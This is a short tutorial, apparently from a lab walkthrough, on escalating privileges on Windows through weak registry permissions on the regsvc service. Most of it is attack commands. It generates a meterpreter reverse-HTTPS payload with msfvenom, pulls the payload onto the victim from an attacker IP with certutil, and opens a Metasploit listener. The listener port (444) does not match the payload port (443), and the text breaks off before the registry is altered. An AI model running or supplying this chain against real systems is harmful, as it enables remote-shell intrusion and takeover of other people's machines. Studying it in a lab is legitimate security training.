In this section we will learn about how to exploit weak registry permissions.

Now, Let’s Start

sc qc regsvc

Untitled

Now, let’s go and check the permissions on this reqistry.

accesschk.exe /accepteula -uvwqk HKLM\\System\\CurrentControlSet\\Services\\regsvc

Untitled

Please Notice that the Interactive users have the all access permissions on the registry

Now, Let’s Exploit The Vulnerability.

  1. Let’s create a payload using msfvenom.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.8.44.22 LPORT=443 -f exe -o administrator.exe

Untitled

Now, Let’s transfer the file to the victim machine.

certutil -urlcache -f <http://10.8.44.22/administrator.exe> administrator.exe

Untitled

Now Let’s Open A listener on our machine.

set payload windows/x64/meterpreter/reverse_https
set lhost tun0
set lport 444
exploit

Untitled

We are now listening.